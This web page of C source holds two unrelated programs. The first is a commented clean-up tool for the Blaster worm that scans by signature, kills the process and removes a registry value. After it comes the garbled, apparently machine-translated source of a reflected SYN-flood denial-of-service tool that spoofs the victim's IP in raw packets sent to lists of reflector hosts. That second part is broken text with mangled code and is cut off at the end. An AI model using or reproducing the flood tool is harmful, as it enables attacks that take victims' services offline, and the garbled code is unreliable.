Virus clean-up tool: source code (MSBlast/Blaster removal example)


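/*
 * Minimal clean-up tool for the MSBlast / Blaster worm, reconstructed from the
 * (badly garbled) listing on this page.  It runs three steps in order:
 *
 *   1. ScanFileVXER  - walk the files matching a pattern in the system
 *                      directory and compare a fixed byte string at a fixed
 *                      file offset against the worm's embedded message.
 *   2. ProcessVXER   - enumerate running processes; terminate any whose main
 *                      module path equals the matched file, then delete it.
 *   3. RegDelVXER    - remove the worm's Run-key persistence value.
 *
 * Limitations inherent to the approach (the original help text says as much):
 * a single fixed-offset signature is defeated by any repacked or modified
 * variant, and the process match is an exact path comparison, so a copy
 * running from another directory is not killed.  Needs administrator rights
 * (SeDebugPrivilege for OpenProcess on other users' processes, write access
 * to HKLM\...\Run).
 */
#define DEBUGMSG

#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#pragma comment(lib, "psapi.lib")

/* GetLastError() is a DWORD: print with %lu. */
#define ERRON GetLastError()

/* Size of the compare buffer in ScanVXER (from the original listing). */
#define HIGH 255

/* Where the signature sits in the worm executable (from the original listing). */
#define VXER_SIG_OFFSET 0x1784L
#define VXER_SIG_LENGTH 0x77   /* 119 bytes == strlen(VXER_SIGNATURE) */

/*
 * The worm's embedded message, used as the byte signature.  The original
 * spelled it out as a hex array; it is the same 119 bytes.
 */
static const char VXER_SIGNATURE[] =
    "I just want to say LOVE YOU SAN!! billy gates why do you make this "
    "possible ? Stop making money and fix your software!!";

TCHAR Name[MAX_PATH] = {0}; /* name (relative to the system dir) of the matched file, "" if none */
FILE *GFP = NULL;           /* report file; NULL when DEBUGMSG is off or the open failed */

BOOL ScanVXER(LPTSTR V_FileName, long V_FileOffset, int V_Length, const TCHAR *V_Contents); /* signature compare */
BOOL ScanFileVXER(LPTSTR FileName);      /* file traversal */
BOOL ProcessVXER(void);                  /* process enumeration / kill */
BOOL KillProc(DWORD ProcessID);          /* terminate one process and wait for it */
BOOL EnablePrivilege(LPTSTR PrivilegeName); /* enable a privilege on our token */
BOOL RegDelVXER(void);                   /* delete the Run-key value */
void Usage(LPCTSTR Parameter);           /* help text */

/*
 * Write a report line.  Goes to the report file when it is open, otherwise to
 * stdout (the original printed to stdout when DEBUGMSG was off, but also used
 * GFP unconditionally in places, which dereferenced NULL in that build).
 */
static void Report(const char *fmt, ...)
{
    va_list ap;
    FILE *out = (GFP != NULL) ? GFP : stdout;

    va_start(ap, fmt);
    vfprintf(out, fmt, ap);
    va_end(ap);
}

/* Copy src into dst[size]. Returns FALSE and leaves dst empty if it does not fit. */
static BOOL CopyBounded(char *dst, size_t size, const char *src)
{
    size_t n = strlen(src);

    if (size == 0 || n >= size) {
        if (size > 0) dst[0] = '\0';
        return FALSE;
    }
    memcpy(dst, src, n + 1);
    return TRUE;
}

/*
 * Entry point.  argv[1] is a file name or wildcard pattern (e.g. "msblast.exe"
 * or "*.exe") looked up in the system directory.  Always returns 0; failures
 * are reported on stdout and in the report file.
 */
int main(int argc, TCHAR *argv[])
{
    if (argc != 2) {
        Usage(argv[0]);
        return 0;
    }
    /* The pattern goes to FindFirstFile; anything path-sized or longer cannot be valid. */
    if (strlen(argv[1]) >= MAX_PATH) {
        printf("File name pattern too long (max %d)\n", MAX_PATH - 1);
        return 0;
    }
#ifdef DEBUGMSG
    GFP = fopen("vxer.txt", "a");
    if (GFP == NULL) {
        printf("Open \"vxer.txt\" fail\n");
        return 0;
    }
#endif
    Report("%s\n\n", "[------------------------- File List -----------------------]");

    if (!ScanFileVXER(argv[1])) {
        printf("ScanFileVXER() GetLastError reports %lu\n", ERRON);
        goto Done;
    }
    if (Name[0] == '\0') {
        /* Nothing matched: no process to kill, no file to delete. Still clean the Run value. */
        printf("No file matched the signature; skipping process scan\n");
    } else if (!ProcessVXER()) {
        printf("ProcessVXER() GetLastError reports %lu\n", ERRON);
        goto Done;
    }
    if (!RegDelVXER()) {
        printf("RegDelVXER() failed\n");
    }

Done:
    if (GFP != NULL) fclose(GFP);
    return 0;
}

/*
 * Enumerate the files matching FileName in the system directory and run the
 * signature compare on each.  Records the (last) matching name in Name.
 * Returns FALSE when the directory cannot be entered or the pattern matches
 * nothing; individual per-file problems are logged and skipped.
 */
BOOL ScanFileVXER(LPTSTR FileName)
{
    WIN32_FIND_DATA FindFileData;
    TCHAR DirBuffer[MAX_PATH] = {0};
    TCHAR FullPath[MAX_PATH] = {0};
    HANDLE hFind;
    DWORD findErr;
    UINT count = 0;

    /* The worm installs itself in the system directory; scan there, not the caller's cwd. */
    if (GetSystemDirectory(DirBuffer, sizeof(DirBuffer)) == 0) {
        printf("GetSystemDirectory() GetLastError reports %lu\n", ERRON);
        return FALSE;
    }
    if (!SetCurrentDirectory(DirBuffer)) {
        printf("SetCurrentDirectory() GetLastError reports %lu\n", ERRON);
        return FALSE;
    }
    hFind = FindFirstFile(FileName, &FindFileData);
    if (hFind == INVALID_HANDLE_VALUE) {
        printf("FindFirstFile() GetLastError reports %lu\n", ERRON);
        return FALSE;
    }
    do {
        /* "." and ".." appear for a bare "*" pattern; the original exit()ed on them. */
        if (strcmp(FindFileData.cFileName, ".") == 0 || strcmp(FindFileData.cFileName, "..") == 0)
            continue;
        if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            continue;
        count++;
        if (GetFullPathName(FindFileData.cFileName, sizeof(FullPath), FullPath, NULL) != 0)
            Report("File:\t\t%s\n", FullPath);
        else
            Report("File:\t\t%s (GetFullPathName() GetLastError reports %lu)\n",
                   FindFileData.cFileName, ERRON);
        /* Note: with several matches the last one wins in Name; ProcessVXER kills only that path. */
        if (ScanVXER(FindFileData.cFileName, VXER_SIG_OFFSET, VXER_SIG_LENGTH, VXER_SIGNATURE))
            Report("MATCH:\t\t%s\n", FindFileData.cFileName);
    } while (FindNextFile(hFind, &FindFileData));
    findErr = GetLastError(); /* capture before anything else can overwrite it */
    FindClose(hFind);
    if (findErr != ERROR_NO_MORE_FILES)
        printf("FindNextFile() GetLastError reports %lu\n", findErr);

    Report("\nFile Total: %u\n\n", count);
    Report("%s\n\n", "[------------------------- File End ------------------------]");
    printf("File Total: %u\n", count);
    return TRUE;
}

/*
 * Compare V_Length bytes at V_FileOffset in V_FileName with V_Contents.
 * On a match, copies V_FileName into the global Name and returns TRUE.
 * Returns FALSE on no match, unreadable file, or a V_Length the fixed compare
 * buffer cannot hold (the original did an unchecked fread into a 255-byte
 * array).  A file shorter than offset+length is never a match: the original
 * compared the zero-padded buffer, which the caller had to hope never matched.
 */
BOOL ScanVXER(LPTSTR V_FileName, long V_FileOffset, int V_Length, const TCHAR *V_Contents)
{
    unsigned char FileContents[HIGH];
    FILE *fp;
    size_t got;

    if (V_Length <= 0 || V_Length > (int)sizeof(FileContents)) {
        printf("ScanVXER(): signature length %d out of range\n", V_Length);
        return FALSE;
    }
    fp = fopen(V_FileName, "rb"); /* binary, read-only; executables stay readable while running */
    if (fp == NULL) {
        printf("fopen() \"%s\" fail\n", V_FileName);
        return FALSE;
    }
    if (fseek(fp, V_FileOffset, SEEK_SET) != 0) {
        fclose(fp);
        return FALSE;
    }
    got = fread(FileContents, 1, (size_t)V_Length, fp);
    fclose(fp);
    if (got != (size_t)V_Length || memcmp(V_Contents, FileContents, (size_t)V_Length) != 0)
        return FALSE;

    printf("File match: %s\n", V_FileName);
    /* Name is MAX_PATH, cFileName never exceeds that, so this should not truncate. */
    if (!CopyBounded(Name, sizeof(Name), V_FileName))
        printf("ScanVXER(): matched file name too long, not recorded\n");
    return TRUE;
}

/*
 * Enumerate all processes, log each one's main module path, and for every
 * process whose path equals <system dir>\Name call KillProc and then delete
 * the file.  Returns TRUE when no kill failed (processes we cannot open are
 * skipped, not counted as failures).  Does nothing when Name is empty.
 */
BOOL ProcessVXER(void)
{
    DWORD Pids[1024];
    DWORD cbPids = 0, cbMods = 0;
    HMODULE hMod;               /* first module == the process's executable */
    TCHAR ProcFile[MAX_PATH];
    TCHAR Target[MAX_PATH];
    TCHAR SysDir[MAX_PATH];
    UINT pcount = 0;
    DWORD i, n;
    BOOL ok = TRUE;

    if (Name[0] == '\0')
        return TRUE;

    /* SeDebugPrivilege lets OpenProcess succeed on processes owned by other users. */
    if (!EnablePrivilege(SE_DEBUG_NAME))
        printf("EnablePrivilege(SE_DEBUG_NAME) failed; some processes may be unreadable\n");

    /*
     * Build the target path from the same system directory ScanFileVXER used.
     * The original hard-coded "c:\winnt\system32\", which is wrong on any box
     * with a different Windows directory, and strcat'ed into a 50-byte buffer.
     */
    if (GetSystemDirectory(SysDir, sizeof(SysDir)) == 0) {
        printf("GetSystemDirectory() GetLastError reports %lu\n", ERRON);
        return FALSE;
    }
    if (strlen(SysDir) + 1 + strlen(Name) >= sizeof(Target)) {
        printf("ProcessVXER(): target path too long\n");
        return FALSE;
    }
    strcpy(Target, SysDir);
    strcat(Target, "\\");
    strcat(Target, Name);

    Report("%s\n\n", "[------------------------- Process List --------------------]");
    if (!EnumProcesses(Pids, sizeof(Pids), &cbPids)) {
        printf("EnumProcesses() GetLastError reports %lu\n", ERRON);
        return FALSE;
    }
    n = cbPids / sizeof(DWORD);
    for (i = 0; i < n; i++) {
        /* Query rights suffice to read the module list; termination rights are taken in KillProc. */
        HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, Pids[i]);
        if (hProc == NULL)
            continue; /* Idle/System, or access denied without SeDebugPrivilege */
        if (EnumProcessModules(hProc, &hMod, sizeof(hMod), &cbMods) &&
            GetModuleFileNameEx(hProc, hMod, ProcFile, sizeof(ProcFile) / sizeof(ProcFile[0])) != 0) {
            Report("[%5lu]\t%s\n", Pids[i], ProcFile);
            pcount++;
            /* Windows paths are case-insensitive; strcmp would miss "...\System32\MSBLAST.EXE". */
            if (_stricmp(Target, ProcFile) == 0) {
                if (KillProc(Pids[i])) {
                    /* KillProc waited for exit, so the image is no longer mapped and can be deleted. */
                    if (!DeleteFile(Target))
                        printf("DeleteFile() \"%s\" GetLastError reports %lu\n", Target, ERRON);
                } else {
                    printf("KillProc(%lu) GetLastError reports %lu\n", Pids[i], ERRON);
                    ok = FALSE; /* keep going: there may be more instances */
                }
            }
        }
        CloseHandle(hProc);
    }

    Report("\nProcess Total: %u\n\n", pcount);
    Report("%s\n\n", "[------------------------- Process End ---------------------]");
    printf("\nProcess Total: %u\n\n", pcount);
    return ok;
}

/*
 * Terminate ProcessID and wait (up to 5 s) for it to actually exit.
 * TerminateProcess only initiates termination and returns immediately; the
 * original deleted the file right after it, which can race the unmapping of
 * the executable.  Returns FALSE if the process cannot be opened, cannot be
 * terminated, or does not exit in time.
 */
BOOL KillProc(DWORD ProcessID)
{
    HANDLE hProc;
    DWORD wait;

    /* Least privilege: PROCESS_ALL_ACCESS is refused more often and is not needed. */
    hProc = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, ProcessID);
    if (hProc == NULL) {
        printf("OpenProcess() GetLastError reports %lu\n", ERRON);
        return FALSE;
    }
    if (!TerminateProcess(hProc, 0)) {
        printf("TerminateProcess() GetLastError reports %lu\n", ERRON);
        CloseHandle(hProc);
        return FALSE;
    }
    wait = WaitForSingleObject(hProc, 5000);
    CloseHandle(hProc);
    if (wait != WAIT_OBJECT_0) {
        printf("Process %lu did not exit within 5 s\n", ProcessID);
        return FALSE;
    }
    return TRUE;
}

/*
 * Enable PrivilegeName (e.g. SE_DEBUG_NAME) on the current process token.
 * Returns TRUE only when the privilege is actually enabled.  The original
 * fell through into its cleanup label on success and always returned FALSE,
 * and it trusted AdjustTokenPrivileges' return value, which is TRUE even when
 * the token does not hold the privilege at all.
 */
BOOL EnablePrivilege(LPTSTR PrivilegeName)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp;
    BOOL ok = FALSE;

    /* GetCurrentProcess() is a pseudo-handle; it needs no CloseHandle. */
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        printf("OpenProcessToken() GetLastError reports %lu\n", ERRON);
        return FALSE;
    }
    if (!LookupPrivilegeValue(NULL, PrivilegeName, &tp.Privileges[0].Luid)) {
        printf("LookupPrivilegeValue() GetLastError reports %lu\n", ERRON);
        goto Close;
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)) {
        printf("AdjustTokenPrivileges() GetLastError reports %lu\n", ERRON);
        goto Close;
    }
    /* The real outcome is in GetLastError(): ERROR_NOT_ALL_ASSIGNED means "not held by this token". */
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        printf("Privilege %s is not held by this token (run as Administrator)\n", PrivilegeName);
        goto Close;
    }
    ok = TRUE;

Close:
    CloseHandle(hToken);
    return ok;
}

/*
 * Delete the Run-key value the worm uses to start at logon.  Returns TRUE when
 * the value is gone (deleted now, or already absent), FALSE on any other
 * registry error.  Registry APIs return the error code directly; the original
 * printed GetLastError(), which they do not set, and closed the key twice on
 * the failure path.
 */
BOOL RegDelVXER(void)
{
    HKEY hKey;
    LONG ret;

    /* Deleting a value needs only KEY_SET_VALUE; KEY_ALL_ACCESS fails under tighter ACLs. */
    ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                       "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
                       0, KEY_SET_VALUE, &hKey);
    if (ret != ERROR_SUCCESS) {
        printf("RegOpenKeyEx() reports %ld\n", ret);
        return FALSE;
    }
    ret = RegDeleteValue(hKey, "windows auto update");
    RegCloseKey(hKey);
    if (ret == ERROR_SUCCESS) {
        printf("Run value \"windows auto update\" deleted\n");
        return TRUE;
    }
    if (ret == ERROR_FILE_NOT_FOUND) {
        /* Already gone or never present: nothing to clean, not a failure. */
        printf("Run value \"windows auto update\" not present\n");
        return TRUE;
    }
    printf("RegDeleteValue() reports %ld\n", ret);
    return FALSE;
}

/* Print the help text to stderr. Parameter is argv[0]. */
void Usage(LPCTSTR Parameter)
{
    LPCTSTR Path = "%SystemRoot%\\system32\\";

    fprintf(stderr,
            "=============================================================\n"
            "Simple anti-virus tool (example implementation)\n"
            "Environment: Win2K Adv Server, Visual C++ 6.0\n"
            "Author: dahubaobao    Home: www.RingZ.org\n"
            "Notice: originally posted by RingZ; please credit the source.\n\n"
            "Usage:   %s <file name or pattern>\n"
            "Example: %s msblast.exe   or   %s *.exe\n\n"
            "Notes:\n"
            "  1. This program only illustrates how a signature scanner is written.\n"
            "  2. The file scan looks only for the Blaster (MSBlast) worm, only in %s.\n"
            "  3. It cannot detect repacked or otherwise modified variants.\n"
            "=============================================================\n",
            Parameter, Parameter, Parameter, Path);
}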

#DEfine debugmsg # include #include #include #include #include #include #pragma Comment (libment , "ws2_32.lib") # define erron getlasterror () # define wsaerron wsagetlasterror () typef struct iPhdr // ip head {uchar verlen; // 4-digit number 4-bit length uchar TOS; // 8 Service Type TOS Ushort total_len; // 16-bit total length ushort IDNet; // 16 bit identifier Ushort flags; // 16 bits logo uchar TTL; // 8-bit TTL Uchar Proto; // 8-bit protocol Ushort checksum; // 16-bit check And Ulong Sourceip; // 32 Bit Source Address Ulong Destip; // 32 Destination Address} iphdr, * piphdr, * lpiphdr; typef struct tcphdr // TCP header {ushort sport; // 16 bits source port Ushort Dport; // 16 Bit Destination Port Ulong SEQ; // 32-bit serial number Ulong Ack; // 32 bit identification number uchar lenres; // 4-bit length 6 reserved word uchar flags; // 6 bit flag Ushort Winsize; // 16-bit window Value ushort checksum; // 16-bit checksum Ushort URP; // 16-bit emergency data offset} TCPHDR, * PTCPHDR, * LPTCPHDR; TYPEDEF STRUCT PSDHDR / / TCP fake department {ulong saddr; // 32-bits source address Ulong Daddr; // 32-bit destination address tchar MBZ; // No Tchar Protol; // Protocol USHORT TCPLEN; / / length} PSDHDR, * PPSDHDR, * LPPSDHDR; TYPEDEDEF STRUCT DRDOSSYNINFO // Parameter structure {uint timeout; // timeout time uint IPLISTNUM; / / IP list counter uint portListNum; // port list counter ULONG AttacksourceIP; // destination IP, set to source IP usort attacksourcePort; // destination port, set to source port Tchar destip [1986] [16]; // Store IP list, reflective source, set-to-purpose IP Tchar Destport [1986] [8]; // store port list, reflected source, set to destination port} DRDOSSYNINFO, * PDRDossynInInfo, * LPDRDossynInInfo; DWORD WINAPI DRDOSSYNFLOODER (LPVOID LPDRDOS); // Flood attack master function ushort checksum (ushort * buffer, int size); // Calculate the check and void usage (LPCTSTSTER Parameter);

/ / Help function int Main (int Argc, tchar * argv []) {drdossynInfo drdossyninfo; // Parameter structure Handle hthread [max_path]; // thread handle uint maxth = 0, threadnum = 0; // thread maximum and thread Counter uint destnum = 0; // destination IP and port counter TCHAR stdinip [16] = {0}, stdinport [8] = {0}; // stored IP and port tchar * Find = null; file * fp = NULL; if (argc <= 2) {usage (argv [0]); return 0;} //} can not be greater than 15 IF (Strlen (Argv [1]) <= 15) DRDossyninfo.attacksourceIP = NTOHL (INET_ADDR (Argv [1])); Else {#ifdef debugmsg printf ("Internet address no larger ten /" #ENDIF RETURN 0;} // port can not be less than 0 and greater than 65535 IF (ATOI (ARGV [ 2])> 0 && atoi (Argv [2]) <65535) DRDossyninfo.attacksourcePort = ATOI (Argv [2]); Else {#ifdef debugmsg printf ("port no less" 0 / "and larger Than /" 65535 / ""); #Ndif return 0;} // Send timeout if (argc> 3) DRDossynInfo.timeout = ATOI (argv [3]); else drdossyninfo.timeout = 666; // Default // thread maximum IF (argc > 4) { IF (ATOI (Argv [4]) <= sizeof (ulong) * 8) Maxthread = ATOI (Argv [4]); Else {#ifdef debugmsg printf ("Thread Num no less"% d / "/ n" Sizeof (ulong) * 8); #ndif return 0;}} else maxthread = 1; // default // parameter too much if (argc> 5) {usage (argv [0]); return 0;} # IFDEF DEBUGMSG / / Details of the output parameters fprintf (stderr, "attic:% s / n" "attackport:% d / n" "TIMEOUT:% D / N" "Maxthread:% D / N"

, Argv [1], DRDOSSYNINFO.TACKSOURCEPORT, DRDOSSYNINIMEOUT, MAXTHREAD; #ENDIF fp = fopen ("destip.txt", "r"); // Open the file IP of the stored IP (fp == null) { #ifdef debugmsg printf ("Open / "Destip.txt/" fail / n "); #ENDIF RETURN 0;} // Detect EOF WHILE (! Feof (fp)) {// read the target IP to stdinip fgets (stdinip , SIZEOF (stdinip), fp); Find = strchr (stdinip, '/ n'); / / Find / N if (find) * Find = '/ 0'; // Replace with / 0 // Copy to the structure STRCPY (DRDOSSYNINFO.Destip [Destnum], stdinip); //printf ("Destip :%S/N" ,Drdossyninfo.destip[destnum]); // Output Destination IP Destnum ; // Counter increment IF (destnum == 1986 ) // A group full, jump out of the loop {Printf ("IP array ful / n"); Break;}} Drdossyninfo.iplistNum = destnum-1; // Read how much IP Printf ("/ NIP List Total Num: / T% D / N ", DESTNUM); / / Output How much IP Destnum = 0 is read; // Reset 0 for reading port fclose (fp); // Close file pointer FP = FOPEN "Destport.txt "," r "); // Open the file IF (fp == null) {#ifdef debugmsg printf (" open /"destport.txt/ "ouil / n"); #ndif return 0;} why (! Feof (fp)) {// Read the purpose port to stdinport fgets (stdinport, sizeof (stdinport), fp); Find = strchr (stdinport, '/ n'); if (find) * Find = '/ 0 '; Strcpy (DRDSSYNINFO.DESTPORT [DESTNUM], stdinport); //printf("Destportf(n" ,Drdossyninfo.destport[Destnum]); destnum ; if (destnum ==

1986) {Printf ("Port Array Full / N"); Break;}} Drdossyninfo.portListNum = DESTNUM-1; // Read how many port printf ("Port List Total NUM: / T% D / N", Destnum); // Output The total read how much port // There is already a reflected source in the current structure, huh Sleep (500); Printf ("/ nStarting ... / n"); // Create an attack thread for (ThreadNum = 0; ThreadNum

WSASTARTUP (Makeword (2, 2), & WSADATA); // Initialization IF (NRET) {#ifdef debugmsg printf ("WsaStartup () error:% d / n", nret); #ENDIF return 0;} SOCK = Socket AF_INET, SOCK_RAW, IPPROTO_RAW); // Establish Socket IF (Sock == Invalid_Socket) {#ifdef debugmsg printf ("socket () getLastError REPORTS% D / N", wsaerron); #ENDIF goto clean;} // Set IP_HDRINCL, Fill yourself with packet nret = setsockopt (Sock, ipproto_ip, ip_hdrincl, (char *) & flag, sizeof (flag)); if (nret == Socket_ERROR) {#ifdef debugmsg printf ("set ip_hdrincl / n"); printf (" setsockopt () GetLastError reports% d / n ", WSAerron); #endif goto Clean;} // set send the timeout timeOut = lpDrDosSynInfo-> timeOut; nRet = setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *) & timeOut, sizeof ( Timeout); if (nret == Socket_ERROR) {#ifdef debugmsg printf ("set so_sndtimeo / n"); Printf ("SETSO Ckopt () getLastError Reports% D / N ", wsaerron); #endif goto clean;} // Fill address structure Memset (& Sai, 0, SizeOf (Sai)); sai.sin_family = AF_INET; sai.sin_port = HTons (LPDRDossynInInfo -> attacksourceport); sai.sin_addr.s_addr = htonfo.dtacksourceIP; for (iPnum = 0, portnum = 0; ipnum , portnum ) {Tchar Sendbuf [256] = {0}; // Transmit buffer / / Extract the objective IP from the structure, and copy to DESTHOST, as the reflected source strcpy (Desthost, LPDRDRDOSSYNINFO-> DESTIP [ipnum]); // Printf ("% s / n", desthost); // From the structure Extract a destination port,

And copy to Destport, as a reflected source strcpy (Destport, LPDRDOSSYNINFO-> DESTPORT [Portnum]); // Printf ("% s / n", destport); // Fill IP header ipHeader.verlen = (4 << 4 | ipHeader / sizeof (ulong)); ipHeader.tos = 0; ipHeader.total_len = htons (ipHeader) sizeof (tcpHeader)); ipHeader.idnet = 1; ipHeader.Flags = 0; ipHeader.ttl = 128; ipHeader.Proto = IPPROTO_TCP; ipHeader.Checksum = 0; ipHeader.SourceIP = htonl (lpDrDosSynInfo-> AttackSourceIP); // victims IP ipHeader.DestIP = inet_addr (DestHost); // object IP // TCP header padding TCPHEADER.SPORT = HTONS (LPDRDOSSYNINFO-> Attacksource); // Victim port TCPHEADER.DPORT = HTONS (ATOI (Destport)); // destination port TCPHEADER.SEQ = 1986; tcpheader.ack = 1; tcpheader.lenRES = Sizeof (TCPHEADER) / 4 << 4 | 0); TCPHEADER.FLAGS = 2; tcpheader.winsize = 1986; tcpheader.checksum = 0; tcpheader.urp = 0; // fill TCP pseudo header psdHeader.Saddr = ipHeader.SourceIP; psdHeader.Daddr = ipHeader.DestIP; psdHeader.mbz = 0; psdHeader.Protol = IPPROTO_TCP; psdHeader.Tcplen = htons (sizeof (tcpHeader)); // calculate TCP checksum memcpy (sendBuf, & psdHeader, sizeof (psdHeader)); memcpy (sendBuf sizeof (psdHeader), & tcpHeader, sizeof (tcpHeader)); tcpHeader.Checksum = checksum ((USHORT *) sendBuf, sizeof (psdHeader) sizeof (TCPHEADER); calculate IP checksum Memcpy (SendBuf, & iPheter, SizeOf (Ipheter)); Memcpy (Sendbuf Sizeof (Ipheter), &

tcpHeader, sizeof (tcpHeader)); memset (SendBuf sizeof (ipHeader) sizeof (tcpHeader), 0,4); DataSize = sizeof (ipHeader) sizeof (tcpHeader); // packet size ipHeader.Checksum = checksum ( (USHORT *) Sendbuf, Sizeof (IpHeader) SizeOf (TCPHEADER)); Memcpy (Sendbuf, & IpHeader, Sizeof (Ipheader)); // Send DSYN = Sendto (Sock, Sendbuf, DataSize, 0, (Struct SockAddr *) & Sai, SizeOf (Sai)); IF (DSYN == Socket_ERROR) {#ifdef debugmsg printf ("Sendto () getLastError Reports% D / N", wsaerron); #ENDIF goto clean;} // ip reads the end, Reset 0 if (ipnum == lpdrdossyninfo-> iPlistNum) ipnum = 0; // port, other homoles (portnum == lpdrdossyninfo-> portListNum) portnum = 0;} clean: if (sock! = Null) // Off Socket CloseSocket (SOCK); WSACLEANUP (); Return 1;} Ushort Checksum (Ushort * Buffer, Int size) {ulong cksum = 0 WHILE (size> 1) {cksum = * buffer ; size- = sizeof (ushort);} if (size) cksum = * (uchar *) Buffer; cksum = (cksum >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16); Return (~ CKSUM);} void usage (lpctstr parameter) {fprintf (stderr, "===================== =====================================

